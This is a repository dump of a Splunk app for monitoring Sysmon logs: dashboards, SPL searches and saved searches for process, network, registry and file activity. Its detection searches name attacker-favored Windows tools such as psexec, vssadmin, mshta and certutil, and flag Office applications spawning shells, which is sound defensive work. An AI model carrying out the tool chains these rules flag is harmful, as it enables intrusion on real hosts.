├── LICENSE ├── README.md ├── default ├── app.conf ├── data │ └── ui │ │ ├── nav │ │ └── default.xml │ │ └── views │ │ ├── README │ │ ├── file_creation_overview.xml │ │ ├── investigator.xml │ │ ├── network_connections.xml │ │ ├── network_overview.xml │ │ ├── overview.xml │ │ ├── process_finder.xml │ │ ├── process_overview.xml │ │ ├── process_timeline.xml │ │ ├── process_watch.xml │ │ ├── registry_overview.xml │ │ ├── suspicious_indicators.xml │ │ └── sysmon_overview.xml ├── macros.conf └── savedsearches.conf ├── metadata └── default.meta └── static ├── appIcon.png ├── appIconAlt.png ├── appIconAlt_2x.png └── appIcon_2x.png /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Michael Haag 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Sysmon Splunk app 2 | 3 | This is combined Splunk App effort between @jarrettp and @m_haggis. 4 | 5 | ### Joint Contributor Credits 6 | 7 | * Gibin John (beahunt3r) 8 | * Vineet Bhatia (threathunting) 9 | 10 | #### What is in the App: 11 | 12 | ##### Dashboards: 13 | - Sysmon Overview - Shows basic overview and usage for Sysmon events. 14 | - Investigator - Allows searching of events for specific hosts, users. 15 | - Network Overview 16 | - File Creation Overview 17 | - Process Overview 18 | - Suspicious Indicators - Collection of some known IOC 19 | - Registry Overview 20 | - Network Connections 21 | - Process Finder - Helps find unique hash values based on percentage 22 | - Process Timeline - Uses LogonGuid to map timeline of processes. Allows clicking for drilldown. 23 | 24 | ##### Reports: 25 | - Over 40+ reports 26 | 27 | ##### Alerts: 28 | - 19 Pre-built alerts 29 | 30 | # Setup 31 | 32 | Deploy [Sysmon-TA](https://splunkbase.splunk.com/app/1914/) 33 | 34 | Download and deploy this app to your Splunk Search Head. 35 | 36 | A macro is used for all saved searches, you will need to modify it for your environment to ensure the proper Sysmon sourcetype/index is searched. 37 | 38 | Macros: Settings --> Advanced Search --> Search Macros. Edit to your environment 39 | 40 | Default - sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" 41 | 42 | Thats it. 43 | 44 | 45 | # Install Sysmon 46 | 47 | ### Install ### 48 | 49 | Run with administrator rights 50 | ~~~~ 51 | sysmon.exe -accepteula -i sysmonconfig-export.xml 52 | ~~~~ 53 | 54 | ### Update existing configuration ### 55 | 56 | Run with administrator rights 57 | 58 | sysmon.exe -c sysmonconfig-export.xml 59 | 60 | Upon installation, Sysmon will begin logging events to the operational event log “C:\Windows\System32\ winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx”. 61 | 62 | ## Sysmon configuration ## 63 | 64 | Sysmon resources and example configuration files may be found [here](https://github.com/MHaggis/sysmon-dfir) 65 | -------------------------------------------------------------------------------- /default/app.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Splunk app configuration file 3 | # 4 | 5 | [install] 6 | is_configured = 0 7 | 8 | [ui] 9 | is_visible = 1 10 | label = Sysmon App for Splunk 11 | 12 | [launcher] 13 | author = MHaggis,kidcrash22 14 | description = 15 | version = 1.0 16 | 17 | [package] 18 | id = sysmon-splunk-app 19 | -------------------------------------------------------------------------------- /default/data/ui/nav/default.xml: -------------------------------------------------------------------------------- 1 | 25 | -------------------------------------------------------------------------------- /default/data/ui/views/README: -------------------------------------------------------------------------------- 1 | Add all the views that your app needs in this directory 2 | -------------------------------------------------------------------------------- /default/data/ui/views/file_creation_overview.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Files Created Over Time 15 | 16 | 17 | `sysmon` EventCode=11 | timechart count 18 | $time.earliest$ 19 | $time.latest$ 20 | 1 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | Top Files Created 51 | 52 | 53 | `sysmon` EventCode=11 | top TargetFilename 54 | $time.earliest$ 55 | $time.latest$ 56 | 1 57 | 58 |
59 |
60 |
61 | 62 | 63 | Top Systems 64 | 65 | 66 | `sysmon` EventCode=11 | top Computer 67 | $time.earliest$ 68 | $time.latest$ 69 | 1 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | Top File Creation Processes 100 | 101 | 102 | `sysmon` EventCode=11 | top Image 103 | $time.earliest$ 104 | $time.latest$ 105 | 1 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 |
115 |
116 |
117 |
-------------------------------------------------------------------------------- /default/data/ui/views/investigator.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 | 12 | 13 | * 14 | * 15 | 16 | 17 | 18 | * 19 | * 20 | 21 |
22 | 23 | 24 | 25 | 26 | `sysmon` Computer=$comp$ user=$usr$ | stats count by EventDescription 27 | $timesel.earliest$ 28 | $timesel.latest$ 29 | 30 | 31 | 32 | 33 | 34 | 35 | Network Destinations 36 | 37 | `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | top dest_host | rename dest_host AS "Destination" 38 | $timesel.earliest$ 39 | $timesel.latest$ 40 | 41 | 42 | 43 | 44 | 45 | 46 | Network Ports 47 | 48 | `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | top dest_port | rename dest_port AS "Destination Port" 49 | $timesel.earliest$ 50 | $timesel.latest$ 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | Critical Processes 60 | 61 | `sysmon` process="*\\powershell.exe" OR process="*\\msbuild.exe" OR process="*\\psexec.exe" OR process="*\\at.exe" OR process="*\\schtasks.exe" OR process="*\\net.exe" OR process="*\\vssadmin.exe" OR process="*\\utilman.exe" OR process="*\\wmic.exe" OR process="*\\mshta.exe" OR process="*\\wscript.exe" OR process="*\\cscript.exe" OR process="*\\cmd.exe" OR process="*\\whoami.exe" OR process="*\\mmc.exe" OR process="*\\systeminfo.exe" OR process="*\\csvde.exe" Computer=$comp$ user=$usr$ | stats count by process 62 | $timesel.earliest$ 63 | $timesel.latest$ 64 | 65 |
66 |
67 | 68 | 69 | Parent/Child Processes 70 | 71 | `sysmon` EventCode="1" Computer=$comp$ user=$usr$ | stats values(ParentImage) by process 72 | $timesel.earliest$ 73 | $timesel.latest$ 74 | 75 |
76 |
77 |
78 | 79 | 80 | 81 | Network Applcations 82 | 83 | `sysmon` EventDescription="Network Connect" Computer=$comp$ user=$usr$ | stats values(dest_host) by Image 84 | $timesel.earliest$ 85 | $timesel.latest$ 86 | 87 |
88 |
89 | 90 | 91 | Hashes by Image 92 | 93 | `sysmon` EventCode="1" Computer=$comp$ user=$usr$ | stats dc(MD5) as numhashes, values(MD5) AS "MD5 Hash" by Image 94 | $timesel.earliest$ 95 | $timesel.latest$ 96 | 97 | 98 |
99 |
100 |
101 |
102 | -------------------------------------------------------------------------------- /default/data/ui/views/network_connections.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 | 12 | 13 | * 14 | 15 | 16 | 17 | * 18 | 19 | 20 | 21 | * 22 | 23 | 24 | 25 | * 26 | 27 |
28 | 29 | 30 | 31 | 32 | `sysmon` EventCode=3 Image="$imgsel$" protocol="$protosel$" dest_port="$portsel$" "$destinations$" | eval Destination=coalesce(dest_host,dest_ip) | stats count, values(Destination) AS "Destinations", values(dest_port) AS "Ports", values(protocol) AS "Protocols" by Image | fields Image Destinations Ports Protocols count 33 | $timsel.earliest$ 34 | $timsel.latest$ 35 | 1 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 |
45 |
46 |
47 |
-------------------------------------------------------------------------------- /default/data/ui/views/network_overview.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Network Connections Over Time 15 | 16 | 17 | `sysmon` EventDescription="Network Connect" | timechart count 18 | $time.earliest$ 19 | $time.latest$ 20 | 1 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | Top Source Hosts 51 | 52 | 53 | `sysmon` EventDescription="Network Connect" | top src_host | rename src_host AS "Source" 54 | $time.earliest$ 55 | $time.latest$ 56 | 1 57 | 58 | 59 | 60 | 61 | 62 | Top Destinations 63 | 64 | 65 | `sysmon` EventDescription="Network Connect" | top dest_host | rename dest_host AS "Destination" 66 | $time.earliest$ 67 | $time.latest$ 68 | 1 69 | 70 |
71 |
72 | 73 | Top Destination Ports 74 | 75 | 76 | `sysmon` EventDescription="Network Connect" | top dest_port | rename dest_port AS "Destination Port" 77 | $time.earliest$ 78 | $time.latest$ 79 | 1 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 |
107 | 108 | 109 | Destination Locations 110 | 111 | 112 | `sysmon` EventDescription="Network Connect" | iplocation dest_ip | geostats count by dest_ip 113 | $time.earliest$ 114 | $time.latest$ 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | Top Applications 123 | 124 | 125 | `sysmon` EventDescription="Network Connect" | top Image 126 | $time.earliest$ 127 | $time.latest$ 128 | 1 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 |
138 |
139 | 140 | Rare Applications 141 | 142 | 143 | `sysmon` EventDescription="Network Connect" | rare Image 144 | $time.earliest$ 145 | $time.latest$ 146 | 1 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 |
156 |
157 |
158 |
-------------------------------------------------------------------------------- /default/data/ui/views/overview.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | High level overview of your Sysmon environment. 4 | 5 | 6 | Computer Count 7 | 8 | 9 | `sysmon` | stats dc(Computer) 10 | -24h@h 11 | now 12 | 1 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | Sysmon-Top EventDescription 32 | 33 |
34 |
35 |
36 | 37 | 38 | 39 | Critical Process 40 | 41 |
42 |
43 |
44 |
-------------------------------------------------------------------------------- /default/data/ui/views/process_finder.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 | Assists in finding rare hash/process values based on percentage 4 |
5 | 6 | 7 | 8 | -24h@h 9 | now 10 | 11 | 12 | 13 | 14 | * 15 | 16 | 17 | 18 | 100 19 | 20 |
21 | 22 | 23 | 24 | 25 | `sysmon` process="$procsel$" | dedup Computer, MD5 26 | | eval TIME=strftime(_time,"%m/%d/%Y %I:%M:%S %p") 27 | | eventstats dc(Computer) as total_host 28 | | stats earliest(TIME) count values(total_host) AS total_host by MD5, process 29 | | eval majority_percent=round((count/total_host)*100,2) 30 | | where majority_percent < $ltpercent$ 31 | | table MD5 process earliest(TIME) count majority_percent total_host 32 | $timesel.earliest$ 33 | $timesel.latest$ 34 | 1 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 |
44 |
45 |
46 |
-------------------------------------------------------------------------------- /default/data/ui/views/process_overview.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Processes Over Time 15 | 16 | 17 | `sysmon` EventDescription="Process Create" | timechart count 18 | $time.earliest$ 19 | $time.latest$ 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | Top Command Line 28 | 29 | 30 | `sysmon` EventDescription="Process Create" | top CommandLine 31 | $time.earliest$ 32 | $time.latest$ 33 | 1 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 |
43 |
44 | 45 | Top Process Creators 46 | 47 | 48 | `sysmon` EventDescription="Process Create" | top User 49 | $time.earliest$ 50 | $time.latest$ 51 | 1 52 | 53 | 54 | 55 | 56 | 57 | 58 | Top Images 59 | 60 | 61 | `sysmon` EventDescription="Process Create" | top Image 62 | $time.earliest$ 63 | $time.latest$ 64 | 1 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 |
74 |
75 |
76 | 77 | 78 | Hashes by Image 79 | 80 | 81 | `sysmon` EventCode="1" | rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)" | stats dc(MD5) as numhashes, values(MD5) AS "MD5 Hash" by Image 82 | $time.earliest$ 83 | $time.latest$ 84 | 1 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 |
94 |
95 |
96 |
-------------------------------------------------------------------------------- /default/data/ui/views/process_timeline.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 | Analyze events with in a given process over time. Click LogonGuid and Processes to drilldown. 4 |
5 | 6 | 7 | 8 | -24h@h 9 | now 10 | 11 | 12 |
13 | 14 | 15 | LogonGuid Selector 16 | 17 | 18 | 19 | 20 | 21 | `sysmon` LogonGuid=* $usrsel$ | dedup LogonGuid | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | table Time LogonGuid user Computer 22 | $timepicker.earliest$ 23 | $timepicker.latest$ 24 | 1 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | $click.value2$ 35 | 36 |
37 |
38 |
39 | 40 | 41 | 42 | 43 | $guidsel$ 44 | 45 | 46 | 47 | `sysmon` LogonGuid="$logsel$" | timechart span=30m count by process limit=20 48 | $timepicker.earliest$ 49 | $timepicker.latest$ 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | $click.name2$ 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | Process: $procsel$ 87 | 88 | `sysmon` LogonGuid="$logsel$" $procsel$ 89 | | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") 90 | | table Time EventDescription Image CommandLine ParentImage ParentCommandLine user 91 | $timepicker.earliest$ 92 | $timepicker.latest$ 93 | 94 |
95 |
96 |
97 |
-------------------------------------------------------------------------------- /default/data/ui/views/process_watch.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Powershell Commands 15 | 16 | 17 | `sysmon` EventDescription="Process Create" 18 | Image="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" OR Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | stats count by CommandLine | sort -count 19 | $time.earliest$ 20 | $time.latest$ 21 | 1 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |
31 |
32 |
33 | 34 | 35 | CMD Commands 36 | 37 | 38 | `sysmon` EventDescription="Process Create" Image="C:\\Windows\\System32\\cmd.exe" | stats count by CommandLine | sort -count 39 | $time.earliest$ 40 | $time.latest$ 41 | 1 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 |
51 |
52 |
53 |
54 | -------------------------------------------------------------------------------- /default/data/ui/views/registry_overview.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Registry Events Over Time 15 | 16 | 17 | `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | timechart count 18 | $time.earliest$ 19 | $time.latest$ 20 | 1 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | Top Processes 51 | 52 | 53 | `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | top Image 54 | $time.earliest$ 55 | $time.latest$ 56 | 1 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 |
66 |
67 | 68 | Top Registry Objects 69 | 70 | 71 | `sysmon` EventCode=13 | eval Time=strftime(_time,"%m/%d/%Y %I:%M:%S %p") | top TargetObject 72 | $time.earliest$ 73 | $time.latest$ 74 | 1 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 |
84 |
85 |
86 |
87 | -------------------------------------------------------------------------------- /default/data/ui/views/suspicious_indicators.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | User Level Injections 15 | 16 | 17 | `sysmon` EventCode=8 SourceImage=*temp* OR SourceImage="C:\\ProgramData\\*" OR SourceImage="C:\\Users\\*" | eval ppid=SourceImage+";"+TargetImage 18 | $time.earliest$ 19 | $time.latest$ 20 | 1 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | Small Filename Length Execution 38 | 39 | 40 | `sysmon` EventCode=1 | rex field=Image "(?<filename>[^\\\]+)$" | eval file_length=len(filename) | where file_length < 6 | table Image, filename, Computer 41 | $time.earliest$ 42 | $time.latest$ 43 | 1 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 |
53 |
54 |
55 | 56 | 57 | svchost Injections 58 | 59 | 60 | `sysmon` EventCode=8 TargetImage="C:\\Windows\\System32\\svchost.exe" | eval ppid=SourceImage+";"+TargetImage | rare ppid 61 | $time.earliest$ 62 | $time.latest$ 63 | 1 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 |
73 |
74 |
75 | 76 | 77 | Commands Running from Office Products 78 | 79 | 80 | `sysmon` EventCode=1 (Image="*\cmd.exe" OR Image="*\powershell.exe" OR Image="*\wscript.exe" OR Image="*\certutil.exe") AND (ParentImage="*\WINWORD.exe" OR ParentImage="*\EXCEL.exe" OR ParentImage="*\PowerPNT.exe") 81 | $time.earliest$ 82 | $time.latest$ 83 | 1 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 |
99 | -------------------------------------------------------------------------------- /default/data/ui/views/sysmon_overview.xml: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 | 7 | -24h@h 8 | now 9 | 10 | 11 |
12 | 13 | 14 | Event Count 15 | 16 | 17 | `sysmon` | stats count 18 | $time.earliest$ 19 | $time.latest$ 20 | 1 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | Event Count Over Time 39 | 40 | 41 | `sysmon` | timechart count 42 | $time.earliest$ 43 | $time.latest$ 44 | 1 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | Event Type Breakdown 73 | 74 | 75 | `sysmon` | stats count by EventDescription 76 | $time.earliest$ 77 | $time.latest$ 78 | 1 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | Events by Host 109 | 110 | 111 | `sysmon` | stats count by Computer | sort - count 112 | $time.earliest$ 113 | $time.latest$ 114 | 1 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 |
124 |
125 | 126 | Events Count by User 127 | 128 | 129 | `sysmon` | stats count by User | sort - count 130 | $time.earliest$ 131 | $time.latest$ 132 | 1 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 |
142 |
143 |
144 |
-------------------------------------------------------------------------------- /default/macros.conf: -------------------------------------------------------------------------------- 1 |  2 | [sysmon] 3 | definition = sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" 4 | iseval = 0 5 | -------------------------------------------------------------------------------- /default/savedsearches.conf: -------------------------------------------------------------------------------- 1 |  2 | [Powershell - EventDescription] 3 | action.email.useNSSubject = 1 4 | alert.track = 0 5 | dispatch.earliest_time = -24h@h 6 | dispatch.latest_time = now 7 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 8 | display.general.type = statistics 9 | display.page.search.mode = verbose 10 | display.page.search.tab = statistics 11 | display.visualizations.charting.chart = bar 12 | display.visualizations.show = 0 13 | request.ui_dispatch_app = sysmon-splunk-app 14 | request.ui_dispatch_view = search 15 | search = `sysmon` process=powershell.exe | stats values(EventDescription) by process 16 | 17 | [Sysmon - Top EventDescription] 18 | action.email.useNSSubject = 1 19 | alert.track = 0 20 | dispatch.earliest_time = -24h@h 21 | dispatch.latest_time = now 22 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 23 | display.general.type = statistics 24 | display.page.search.mode = verbose 25 | display.page.search.tab = statistics 26 | display.visualizations.charting.chart = bar 27 | display.visualizations.show = 0 28 | request.ui_dispatch_app = sysmon-splunk-app 29 | request.ui_dispatch_view = search 30 | search = `sysmon` | top EventDescription 31 | 32 | [Sysmon - Parent to Child] 33 | action.email.useNSSubject = 1 34 | alert.track = 0 35 | dispatch.earliest_time = -24h@h 36 | dispatch.latest_time = now 37 | dispatchAs = user 38 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 39 | display.general.type = statistics 40 | display.page.search.mode = verbose 41 | display.page.search.tab = statistics 42 | display.visualizations.charting.chart = bar 43 | display.visualizations.show = 0 44 | request.ui_dispatch_app = sysmon-splunk-app 45 | request.ui_dispatch_view = search 46 | search = `sysmon` NOT splunk | stats values(ParentImage) by process 47 | 48 | [EventDescription - by process, Commandline] 49 | action.email.useNSSubject = 1 50 | alert.track = 0 51 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 52 | display.general.type = statistics 53 | display.page.search.mode = verbose 54 | display.page.search.tab = statistics 55 | display.visualizations.charting.chart = bar 56 | display.visualizations.show = 0 57 | request.ui_dispatch_app = sysmon-splunk-app 58 | request.ui_dispatch_view = search 59 | search = `sysmon` NOT splunk | stats values(EventDescription) by process,CommandLine 60 | 61 | [Powershell - All PoSh by Computer] 62 | action.email.useNSSubject = 1 63 | alert.track = 0 64 | dispatchAs = user 65 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 66 | display.general.type = statistics 67 | display.page.search.mode = verbose 68 | display.page.search.tab = statistics 69 | display.visualizations.charting.chart = bar 70 | display.visualizations.show = 0 71 | request.ui_dispatch_app = sysmon-splunk-app 72 | request.ui_dispatch_view = search 73 | search = `sysmon` process=powershell.exe | stats values(CommandLine) by Computer,process 74 | 75 | [net - All net usage] 76 | action.email.useNSSubject = 1 77 | alert.track = 0 78 | dispatch.earliest_time = -60m@m 79 | dispatch.latest_time = now 80 | dispatchAs = user 81 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 82 | display.general.type = statistics 83 | display.page.search.mode = verbose 84 | display.page.search.tab = statistics 85 | display.visualizations.charting.chart = bar 86 | display.visualizations.show = 0 87 | request.ui_dispatch_app = sysmon-splunk-app 88 | request.ui_dispatch_view = search 89 | search = `sysmon` process=net.exe | stats count by Computer,CommandLine 90 | 91 | [wmic.exe - all wmic execution] 92 | action.email.useNSSubject = 1 93 | alert.track = 0 94 | dispatch.earliest_time = -60m@m 95 | dispatch.latest_time = now 96 | dispatchAs = user 97 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 98 | display.general.type = statistics 99 | display.page.search.mode = verbose 100 | display.page.search.tab = statistics 101 | display.visualizations.charting.chart = bar 102 | display.visualizations.show = 0 103 | request.ui_dispatch_app = sysmon-splunk-app 104 | request.ui_dispatch_view = search 105 | search = `sysmon` process=wmic.exe | stats count by Computer,CommandLine 106 | 107 | [CommandLine - By computer, process] 108 | action.email.useNSSubject = 1 109 | alert.track = 0 110 | dispatchAs = user 111 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 112 | display.general.type = statistics 113 | display.page.search.mode = verbose 114 | display.page.search.tab = statistics 115 | display.visualizations.charting.chart = bar 116 | 